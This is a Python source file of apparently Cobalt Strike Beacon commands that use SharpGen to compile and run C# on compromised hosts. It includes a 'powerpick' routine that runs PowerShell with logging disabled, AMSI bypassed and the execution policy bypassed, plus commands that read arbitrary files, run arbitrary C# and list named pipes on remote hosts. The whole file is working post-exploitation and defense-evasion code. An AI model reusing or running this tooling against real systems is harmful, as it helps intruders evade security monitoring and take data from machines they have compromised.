def custom_powerpick(bid, command, silent=False, auto_host=True):
# public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true)
code = helpers.code_string(r"""
string powershell = String.Join("\n", args);
var results = Execution.PowerShell.RunAsync(powershell, disableLogging: true, disableAmsi: true, bypassExecutionPolicy: true);
foreach (string result in results) {
Console.Write(result);
}
""")
if not silent:
aggressor.btask(
bid, 'Tasked beacon to run: {} (custom unmanaged)'.format(
command.replace('\n', ' ')))
# include cradle for `powershell-import`/`bpowershell_import`
cradle = aggressor.beacon_host_imported_script(bid)
if cradle:
command = cradle + '\n' + command
# if the script is too long, host it
if auto_host and len(command) > max_script_size:
command = aggressor.beacon_host_script(bid, command)
engine.message(command)
references = [
'mscorlib.dll', 'System.dll', 'System.Core.dll',
'System.Management.Automation.dll'
]
sharpgen.execute(bid,
code, [''] + command.split('\n'),
references=references,
resources=[],
cache=sharpgen_cache)
def _(bid, code, *args):
aggressor.btask(bid, 'Tasked beacon to execute C# code: {}'.format(code))
try:
sharpgen.execute(bid, code, *args)
except RuntimeError as e:
aggressor.berror(
bid, 'SharpGen failed. See script console for more details')
def _(bid, fname, lines=10):
code = helpers.code_string(r"""
string file = args[0];
int lines = Int32.Parse(args[1]);
string text = string.Join("\r\n", System.IO.File.ReadLines(file).Take(lines));
System.Console.WriteLine(text);
""")
aggressor.btask('Tasked beacon to get first {} lines of {}'.format(
lines, fname))
sharpgen.execute(bid, code, (fname, lines))
def _(bid, *files):
if not files:
aggressor.berror(bid, 'cat: specify some files to cat')
return
code = helpers.code_string(r"""
foreach (string file in args) {
var text = System.IO.File.ReadAllText(file);
System.Console.Write(text);
}
""")
aggressor.btask(
bid, 'Tasked beacon to get contents of: {}'.format(', '.join(files)))
sharpgen.execute(bid, code, files)
def _(bid, *args):
# public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true)
code = helpers.code_string("""
foreach (string arg in args) {
Console.WriteLine("> " + arg);
}
""")
sharpgen.execute(
bid,
code,
args,
add_references=['System.Management.Automation.dll', 'SharpSploit.dll'],
cache=True,
delete_after=False,
silent=False)
def _(bid, code, *args):
aggressor.btask(bid, 'Tasked beacon to execute C# code: {}'.format(code))
try:
from_cache = sharpgen.execute(bid, code, args, cache=cache)
if from_cache:
aggressor.blog2(bid, 'Build was retrieved from the cache')
except RuntimeError as e:
aggressor.berror(
bid, 'SharpGen failed. See Script Console for more details.')
def _(bid, *hosts):
if not hosts:
hosts = ('.',)
# read in pipe descriptions
pipes = {}
for line in open(utils.basedir('resources/pipes.txt')):
pipe, description = line.split('\t')
pipe = pipe.lower()
pipes[pipe] = description
code = helpers.code_string(r"""
foreach (string host in args) {
string path = $@"\\{host}\pipe";
foreach (string pipe in System.IO.Directory.GetFiles(path)) {
Console.WriteLine(pipe);
}
}
""")
aggressor.btask(bid, 'Tasked beacon to list pipes on {}'.format(', '.join(hosts)))
sharpgen.execute(bid, code, hosts)